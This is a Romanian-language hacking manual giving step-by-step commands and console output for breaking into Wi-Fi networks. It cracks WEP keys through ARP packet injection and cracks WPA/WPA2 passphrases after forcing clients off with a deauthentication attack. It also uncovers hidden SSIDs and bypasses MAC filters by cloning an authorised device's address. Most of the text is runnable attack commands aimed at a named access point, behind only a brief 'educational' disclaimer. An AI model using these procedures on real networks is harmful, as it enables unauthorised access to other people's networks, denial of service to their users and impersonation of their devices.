VulnerabilitatinWLAN

Criptare si Cracking Wep (metoda de accelerare:Airodump,Aireplay,Aircrack);Criptare si Cracking WPA/WPA2 (metoda de accelerare:Aircrack,Genpmk,Cowpatty);Cum sa descoperiti un punct de acces invizibil/ascuns(Hidden SSID);Cum sa clonati o adresa MAC;Cum sa evitati filtrele MAC;

Mihai Valentin Dumitru

Vulnerabilitati WLAN(WEP/WPA/WPA2/PSK)

Inainte de a pune in aplicare informatiile cuprinse in acest scurt manual,ganditi-va la motivulcare v-ar determina sa folositi toate aceste informatii.Acest manual a fost creat cu scop strict edu-cativ urmand ca cei ce vor folosi aceste informatii in scopuri ce ar putea fi considerate mai putinetice sa-si asume atat responsabilitatea cat si consecintele faptelor sale. Pentru a putea aplica toate aceste informatii veti aveti nevoie de un punct de lucru dotat cu sistemul de operare Backtrack5 . Puteti descarca acest sistem de operare accesand pagina oficiala Backtrack http://www.backtrack-linux.org/downloads/ urmand ca mai apoi sa instalati acest sistem de operare derivat Linux. Mergand pe principiul conform caruia teoria si practica sunt interdependente vom trece directla practica urmand sa dezbatem in paralel tot ceea ce implica partea teoretica,astfel:Vom incepe deschizand o consola (terminal) si creand o interfata de monitorizare mon0.Pentru a crea aceasta interfata vom introduce in consola comanda:airmon-ng start wlan0

root@bt:~# airmon-ng start wlan0Interface Chipset Driver

wlan0 (Fabricant) (driver) (monitor mode enabled on mon0)

Pentru a verifica daca aceasta interfata a fost creata vom folosi comanda airmon-ng.

La fel de bine se poate folosi si comanda ifconfig iar in cazul in care interfata mon0 a fost creatavom observa ca va fi afisata alaturi de toate celelalte interfate active si functionale:

Criptare WEP si metoda de cracking:

root@bt:~# airmon-ng Interface Chipset Driver

wlan0 (Fabricant) (driver) mon0 (Fabricant)

root@bt:~# ifconfiglo Link encap:Local Loopback

inet addr:127.0.0.1 Mask 255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric 1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrer:0

mon0 Link encap:UNSPEC Hwaddr:00:02:A5:B8:B0:53:00:00:00:00:00:00:00:00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3794 errors:0 dropped:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrer:0

wlan0 Link encap Ethernet Hwaddr:00:02:A5:B8:B0:53 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrer:0 colissions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Presupunand ca am activat deja o interfata de monitorizare mon0,asa cum am vazut in capitolul anterior , vom trece la pasii urmatori,pasi ce constau in scanarea si localizarea unui punct de acces (AP).Pentru a descoperi si afisa retelele disponibile din raza de actiune a dispozitivului nostru wire-less utilizam comanda airodump-ng mon0

Vom alege punctul de acces cu ESSID Romtelecom si MAC 1C:1D:67:10:06:E5 si vom initiapractic procesul de cracking impotriva punctului de acces(AP) Romtelecom executand comanda:

airodump-ng –bssid 1C:1D:67:10:06:E5 –c 11 –w crackromtelecom mon0

-bssid –adresa MAC a punctului de acces Romtelecom-c 11 -canalul 11 sau frecventa de emisie a punctului de control-w crackromtelecom – denumirea fisierului in care vor fi stocate pachetele de date necesare

Putem obsera ca exista un client/dispozitiv conectat la punctul de acces Romtelecom.Acest dis-pozitiv ne va ajuta sa obtinem volumul de date(#Data) necesar pentru a putea duce la bun sfarsit procesul de cracking.Am observat foarte multe tutoriale web despre aceasta modalitate de cracking a unui punct de acces dar in acelasi timp am mai observat ca majoritatea celor ce au publicat aceste tutoriale nu au apelat si la procedura de accelerare a procesului de cracking.Oare de ce? In continuare voi incerca atat sa explic cat sa si aplic aceasta procedura ce consta in accelera-rea procesului de WEPcracking,procedura ce poate fi foarte utila referindu-ne la faptul ca perioadanecesara executarii procesului se poate reduce semnificativ. Vom initia captura pachetelor de date ARP (ARP Packets) utilizand aireplay-ng urmand apoi sa reinjectam (Packet injection) toate aceste pachete in retea.In acest fel vom reproduce sau simulamai multe raspunsuri ARP(ARP Response). Cu cat vom reproduce si reinjecta mai multe raspunsuri ARP cu atat vom mari fluxul de date din retea,reducand astfel timpul necesar procesului de cracking.Trebuie mentinut faptul ca ARP este un protocol ce contine un volum de date prestabilit si egal in toate cazurile .Folosindu-ne de

root@bt:~# airodump-ng mon0

CH11 ][ Elapsed : 40 s ][ Data/Ora ]

BSSID PWR RXQ Beacons #Data , #s CH Mb ENC CIPHER AUTH ESSID

1C:1D:67:10:06:E5 -10 70 7206 88 0 11 54. WEP WEP Romtelecom

BSSID STATION PWR Rate Lost Packet Probes

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -20 0 -1 0 3 Romtelecom

root@bt:~# airodump-ng –bssid 1C:1D:67:10:06:E5 –c 11 –w crackromtelecom mon0

CH11 ][ Elapsed : 1 min 25 s ] [ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ]




1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -26 0 - 1 0 20 Romtelecom

aceasta informatie vom putea distinge pachetele ARP incluse in traficul de date din retea oricare ar fi aceasta:

Astfel:aireplay-ng -3 –b 1C:1D:67:10:06:E5 –h 06:02:A8:C8:C0:23 mon0

-3 – Optiunea pentru reproducere ARP packets;-b – Adresa MAC a punctului de acces;-h – Adresa MAC a clientului/dispozitiuvului de care ne folosim pentru a reproduce pachetele ARP

Priviti consola in care se executa airodump-ng si veti observa ca volumul de date a crescut semni-ficativ,acest fapt datorandu-se procesului de accelerare produs de aireplay

Deschideti o consola(terminal) noua si executati comanda aircrack-ng crackromtelecom-01.cap

-crackromtelecom-01.cap este fisierul in care se stocheaza pachetele de date necesare procesului de cracking.

NOTA: Chiar daca am executat comanda aircrack-ng crackromtelecom-01.cap,acest fisier continua sa stocheze pachete de date, asa cum vom observa in imaginile de mai jos,indiferent daca vom obtine sau nu WEPKEY ul din prima incercare.

Rezultatele afisate pe ecran sunt mai mult sau mai putin similare rezultatelor afisate in imaginea de

root@bt:~# aireplay-ng -3 –b 1C:1D:67:10:06:E5 –h 06:02:A8:C8:C0:23 mon0

root@bt:~# aireplay-ng -3 –b 1C:1D:67:10:06:E5 –h 06:02:A8:C8:C0:23 mon0The interface MAC (00:02:A5:B8:B0:53) doesn’t match the specified MAC (-h). Ifconfig mon0 hw ether 06:02:A8:C8:C0:234:02:27 Waiting for beacon frame (BSSID: 1C:1D:67:10:06:E5) on channel 11Saving ARP requests in replay_arp-10-037987.capYou should also start airodump-ng to capture replies.Read 7032 packets (got 2016 ARP requests and 2010 ACKs), sent 1934 packets…(500 pps)

CH11 ][ Elapsed : 3 min 25 s ][ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ]





root@bt:~# aircrack-ng crackromtelecom-01.capOpening crackromtelecom-01.capRead 168992 packets.

# BSSID ESSID Encryption 1 1C:1D:67:10:06:E5 Romtelecom WEP (12336 IV’s)

Choosing first network as target.

Opening crackromtelecom-01.capReading packets, please wait…

mai jos,valorile reale fiind inlocuite cu valoarea X din motive lesne de inteles.

Asa cum spuneam in randurile de mai sus,este posibil sa nu reusim sa obtinem Wepkey-ul dinprima incercare.In acest caz singura optiune ar fi sa asteptam.

Nu aveti de ce sa va faceti griji,in mod normal,procesul de cracking poate dura ore intregi,si depinde strict de volumul de date capturat si reinjectat in retea.Dar folosind aireplay/ng putem reduce aceasta perioada la ordinul minutelor.(5-10 minute). Analizam un pic sintaxa “Failed. Next try with 15000 IV’s” unde IV(Initialization Vector)Procesul de cracking a fost oprit deoarece inca nu am reusit sa obtinem volumul de date necesar pentru a putea calcula Wepkey-ul,urmand ca acest proces sa se reia automat in momentul in care numarul de vectori de initializare obinuti ar ajunge la 20000.Odata activat , aircrack este setat sa initializeze un proces de cracking din 5000 in 5000 de IV(aceasta valoare se poate modifica). Atunci cand vom dispune de un numar suficient de pachete de date,Wepkey-ul va fi calculat sirezultatul va fi afisat pe ecran asa cum vom vedea in imaginea de mai jos:

Aircrack-ng 1.0 [00:00:00] Tested XXXXXX keys (got 12456 IV’s)

KB depth byte(vote) 0 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 1 0/ 1 XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) 2 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) 4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) 5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256) 6 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512) 7 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) 8 0/ 1 XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 9 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)10 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)11 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)12 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)


KB depth byte(vote) 1 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 2 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) 3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) 4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256) 5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512) 6 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) Failed. Next try with 15000 IV’s

Pentru a calcula(crack) un wepkey(parola wifi) a unui punct de acces,in cazul nostru Romtelecomavem nevoie de un numar suficient de pachete de date,parola wep putand fi calculata indiferent de complexitatea sau lungimea acesteia.

Criptare WPA/WPA2 si metoda de cracking: WPA este un protocol de securitate ce foloseste ca algoritm de criptare a pachetelor de datealgoritmul TKIP (Temporal Key Integrity Protocol).Trebuie mentionat faptul ca si protocolul WEPpe care l-am dezbatut in capitolul anterior foloseste acleasi algoritm pentru a cripta pachetele de date wireless dar in cazul WPA,cheile se genereaza in alt mod. WPA2 a fost creat cu scopul de a imbunatati versiunea WPA,folosind ca algoritm de criptare unalgoritm mult mai eficient si mai robust numit AES (Advanced Encryption Standard).Asa cum vomobserva in randurile de mai jos,atat WPA cat si WPA2 sunt doua protocoale de date vulnerabileatacurilor bazate pe dictionare.Pentru a putea realiza cu succes un atac WPA/WPA2 am avea nevoiede 2 factori:

1.Un dictionar bine bus la punct,care sa contina fraze(si nu numai) specifice zonei in care va aflati.2.Al doilea factor consta in capturarea unui WPA Hand shake sau un salut pe 4 cai.Vom analiza cum se efectueaza acest WPA Hand Shake cu ajutorul imaginii de mai jos explicand in acelasi timpsi modul sau de functionare:


KB depth byte(vote) 0 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 1 0/ 1 XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) 2 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) 4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) 5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256) 6 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512) 7 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) 8 0/ 1 XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) 9 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)10 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)11 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)12 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)

KEY FOUND [ XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ] Decrypted correctly : 100%

Poate ca multi dintre voi va veti intreba “Ce este un PTK sau cum se genereaza?”.PTK (Pair-wise Transition Key) este o cheie de criptare folosita in procesul WPA Hand Shake si se obtine prin concatenarea mai multor factori,acestia fiind,adresa MAC a punctului de acces,adresa MAC a clientului,PMK,valoarea (Anonce) si valoarea (Snonce).Sa trecem la fapte! Dar innainte sa incepem,trebuie mentionat faptul ca pentru a obtine parola unei retea wirelessatat procedura cat si pasii ce trebuiesc urmati vor fi aceasi indiferent daca protocolul de securitateatacat ar fi WPA sau WPA2.

Presupunand ca am setat punctul de acces Romtelecom sa aplice o protectie WPA sau WPA2 ,deschideti o consola Backtrack si introduceti:

airodump-ng –bssid 1C:1D:67:10:06:E5 –c 11 –w crackromtelecomWPA mon0

In cazul in care nu exista nici un client conectat la punctul de acces Romtelecom ,va trebui saasteptam momentul in care un client se va conecta la acest punct de control sau sa efectuam un atacDOS.Prin acest atac vom obliga practic toti clientii conectati sa se deconecteze,urmand ca in momen-tul in care vor incerca sa se reconecteze sa capturam Handshake pe care acesta il efectueaza cu pun-ctul de acces.Atacul va decurge astfel:

1.Deschideti o consola noua Backtrack;2.In consola executati comanda aireplay-ng –-deauth 1 –a 1C:1D:67:10:06:E5 mon 0

In momentul in care un client se conecteaza la punctul de acces structura consolei va fi urmatoarea:

In momentul in care se obtine o captura WPA Handshake,aceasta se a afisa in coltul superiordreapta al consolei. Ex: WPA Handshake 1C:1D:67:10:06:E5.Intrerupem procesul airodump apasand Ctrl-C.

Imediat vom initia si procesul de cracking dar inainte de asta trebuiesc facute cateva precizari.Asa cum spuneam ,in cazul unui atac WPA/WPA2 eficacitatea atacului depinde strict si in totalitate de dictionarul de care dispuneti.Backtrack contine un asemenea dictionar stocat intr-un fisier numitdarkc0de.lst,dar, de a lungul timpului am observat ca acest dictionar nu este foarte eficient in cazul in care efectuati un atac asupra unui punct de acces din zona Europei de est si nici macar in zona Eu-ropei centrale sau de vest(Spania,Franta,Italia). Va pot spune cu siguranta ca in urma stransei colaborari ale gruparilor “Anonymous” ce activea-za in diferite zone ale globului,au fost intocmite dictionare specifice zonelor respective.

root@bt:~# airodump-ng –bssid 1C:1D:67:10:06:E5 –c 11 –w crackromtelecomWPA mon0

CH11 ][ Elapsed : 1 min 05 s ] [ Data/Ora ]


1C:1D:67:10:06:E5 -15 70 1206 10 0 11 54. WPA TKIP Romtelecom


root@bt:~# aireplay-ng –-deauth 1 –a 1C:1D:67:10:06:E5 mon 006:20:06 Waiting for beacon frame (BSSID 1C:1D:67:10:06:E5) on channel 11NB:This attack is more effective when targeting a connected wireless client(-c <client’s MAC>).06:20:06 Sending DeAuth to broadcast –- BSSID: [1C:1D:67:10:06:E5]root@bt:~#

CH11 ][ Elapsed : 16 min 05 s ] [ Data/Ora ][ WPA Handshake 1C:1D:67:10:06:E5 ]


1C:1D:67:10:06:E5 -16 70 3566 108 0 11 54. WPA TKIP Romtelecom



Dar datorita faptului ca acest manual a fost creat cu interes strict demonstrativ ne vom rezumala folosirea dictionarului pus la dispozitie de sistemul de operare Backtrack iar pentru a invoca acestdictionar vom deschide o consola noua si vom introduce comanda:

aircrack-ng crackromtelecomWPA.cap –w /pentest/passwords/wordlists/darkc0de.lst

Astfel:

Asa cum spuneam si in capitolul anterior exista un mod de a accelera procesul de cracking WPAWPA2 pe care il vom dezbate si explica in continuare. Pentru a putea accelerarea procesul de cracking WPA si a reduce perioada de timp necesara ob-tinerii parolei va trebui sa calculam valoarea factorului PMK(Pairwise Master Key) sau PSK(Pre-Shared Key).Valoarea PMK se obtine prin concatenarea altor doi factori importanti precum SSID si cheie. Vom folosi un generator PMK numit genpmk astfel deschizand o consola noua in Backtrack si in-troducand comanda :

genpmk -f /pentest/passwords/wordlists/darkc0de.lst –d PMK-crackromtelecomWPA -s “Romtelecom”

root@bt:~# aircrack-ng crackromtelecomWPA.cap –w /pentest/passwords/wordlists/darkc0de.lst

Aircrack-ng 1.0 [00:00:00] Tested 876890 keys (726.6 k/s)

KEY FOUND! [XXXXXXXXX]

Master Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

Transient Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

EAPOL HMAC: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

root@bt:~# genpmk -f /pentest/passwords/wordlists/darkc0de.lst –d PMK-crackromtelecomWPA -s “Romtelecom”genpmk 1.1 WPA-PSK precomputation atack. <[email protected]>File PMK-crackromtelecomWPA does not exist, creating.key no. 1000:XXXXXXXkey no. 2000:XXXXXXXXXkey no. 3000:XXXXXkey no. 4000:XXXXXXXXkey no. 5000:XXXXXXXkey no. 6000:XXXXXXXXXX

Acum ca am generat PMK-ul acesta se va stoca in fisierul PMK-crackromtelecomWPA urmand sa folosim comanda cowpatty pentru a extrage parola necesara conexiunii:

cowpatty –d PMK-crackromtelecomWPA –s “Romtelecom” –r crackromtelecomWPA-01.cap

In momentul in care a fost descoperita parola structura consolei va fi urmatoarea:

Trebuie mentionat faptul ca parola WPA/WPA2 poate fi calculata numai in cazul in care aceasta esteinclusa in dictionarul utilizat in procesul de cracking

root@bt:~# cowpatty –d PMK-crackromtelecomWPA –s “Romtelecom” –r crackromtelecomWPA-01.capCollected all necessary data to mount crack against WPA/PSK passphrase.Starting dictionary atack. Please be patient.

key no. 1000:XXXXXXXkey no. 2000:XXXXXXXXXkey no. 3000:XXXXXkey no. 4000:XXXXXXXXkey no. 5000:XXXXXXXkey no. 6000:XXXXXXXXXXkey no. 7000:XXXXXXXXkey no. 8000:XXXXXXXXkey no. 9000:XXXXXXXkey no. 10000:XXXXXXXXkey no. 11000:XXXXXXkey no. 12000:XXXXXXXXkey no. 13000:XXXXXXXXXXXkey no. 14000:XXXXXXXXXkey no. 15000:XXXXXXXXXXkey no. 16000:XXXXXXXXXXXXkey no. 17000:XXXXXXXXXkey no. 18000:XXXXXXXXXXXXXX

key no. 111000:XXXXXXXkey no. 112000:XXXXXXXXXkey no. 113000:XXXXXkey no. 114000:XXXXXXXXkey no. 115000:XXXXXXXkey no. 116000:XXXXXXXXXXkey no. 117000:XXXXXXXXkey no. 118000:XXXXXXXXkey no. 119000:XXXXXXXkey no. 120000:XXXXXXXXkey no. 121000:XXXXXXkey no. 122000:XXXXXXXX

The PSK is “XXXXXXXX”122000 passphrases tested in [X] seconds. [X] passphrases/sec

Cum sa descoperiti o retea WIFI invizibila(Hidden SSID)

Pentru a putea descoperi o retea WIFI invizibila/ascunsa (Hidden SSID) vom deschide o consola si vom invoca airodump-ng astfel:

Metoda consta in asteptarea momentului in care un client autorizat se va conecta la punctul de ac-ces vizat. Incercarea,implicit conectarea clientului la punctul de acces invizibil/ascuns va genera o solicitare(Probe Request) din partea aceluiasi client si un raspuns (Probe Response) din partea dispozitivului(AP)sau a punctului de acces. Atat solicitarea cat si raspunsul contin SSID-ul punctului de acces, dezvaluind practic identitatea punctului de acces invizibil. Asa cum veti observa punctul de acces invizibil a fost descoperit,acesta find marcat <length: 6>.

Cum sa inselati filtrele MAC (MAC Filters)

Filtrele MAC se bazeaza pe o lista ce contine adresele MAC ale clientilor autorizati.Toate celelalte dispozitive,ale caror adrese MAC nu sunt incluse in lista de filtrare MAC gestio-nata de administratorul de retea, nu vor fi obtine autorizatia de conexiune la punctul de acces. Veti putea vedea cat de usor poate fi evitat acest filtru,clonand o adresa MAC a unui clientsau dispozitiv a carui adresa MAC este inclusa in lista clientilor/dispozitivelor autorizate:

In consola BackTrack/Linux executati urmatoarea comanda:

airodump-ng –c11 –a –bssid <MAC_punct_acces_vizat> mon0

In cazul nostru vom folosi un punct de acces cu ESSID “Romtelecom” si a carui adresa MAC este 1C:1D:67:10:06:E5 astfel:

Rezultatul afisat pe ecran va fi urmatorul:

CH11 ][ Elapsed : 0 min 05 s ] [ Data/Ora ][


1C:1D:67:10:06:E5 -16 70 3566 108 0 11 54e WPA TKIP Romtelecom28:EF:01:35:32:64 -42 17 0 0 6 11 54e WPA TKIP <length: 6>


28:EF:01:35:32:64 06:02:A8:C8:C0:23 -32 0 - 1 0 30 <length: 6>

root@bt:~# airodump-ng –c11 –a –bssid 1C:1D:67:10:06:E5 mon0

Unde:

-c 11 Specifica numarul canalului sau frecventa de emisie a punctului de acces;-a Afiseaza numai adresele MAC ce corespund clientilor ce deja au obtinut autorizatie de conexiune la punctul de acces vizat.

In momentul in care in consola(terminal) BackTrack/Linux se va afisa adresa MAC a unuiclient conectat la punctul de acces vom retine adresa MAC a clientului respectiv urmand sa fo-losim acea adresa pentru a obtine autorizatie de conexiune,implicit sa evita/insela filtrele MAC. Pentru a putea shimba adresa MAC a interfatei de conexiune in asa fel incat sa coincida cu adresa MAC a unui dispozitiv autorizat,in cazul nostru 06:02:A8:C8:C0:23 va trebui sa urmam pasii urmatori:

1.Vom dezactiva interfata wlan0;

ifconfig wlan0 down

2.Vom schimba adresa MAC atribuita interfatei pe care noi o folosim inlocuind aceasta adresa cu adresa MAC a dispozitivului autorizat:

macchanger -m 06:02:A8:C8:C0:23 wlan0

3.Vom reactiva interfata wlan0;

ifconfig wlan0 up

4.Vom verifica daca intr-adevar schimbarea adresei MAC a fost efectuata:

macchanger --show wlan0

CH11 ][ Elapsed : 40 s ][2013


1C:1D:67:10:06:E5 -7 90 206 18 0 11 54e OPN Romtelecom


1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 -14 0 -1 0 3 Romtelecom

root@bt:~# macchanger -m 06:02:A8:C8:C0:23 wlan0Current MAC: 00:02:A5:B8:B0:53 (Fabricant)Faked MAC: 06:02:A8:C8:C0:23 (Fabricant)

root@bt:~# macchanger --show wlan0Current MAC: 06:02:A8:C8:C0:23 (Fabricant)

NOTA: Prin intermediul comenzii macchanger puteti schimba adresa MAC a interfatei wlan0 atata timp cat valoarea noua a acesteia va fi una valabila. Introduceti in consola macchanger --list sau macchanger -l si veti observa ca va fi afisata o lista cu majoritatea fabricantilor si numarul de identificare MAC.De exemplu primele trei grupuri de 2 cifre EX: 00:90:27 -Intel Corporation reprezinta amprenta fabricantului.Chiar daca voi uti-lizati o interfata fabricata de CISCO sa spunem,puteti schimba adresa MAC astfel incat sa conste ca folositi o interfata fabricata de Intel astfel:

macchanger --mac 00:90:27:11:11:11 wlan0

00:90:27 amprenta fabricantului;

Dumitru Mihai Valentin: [email protected]

VulnerabilitatinWLAN

Documents

Transcript of VulnerabilitatinWLAN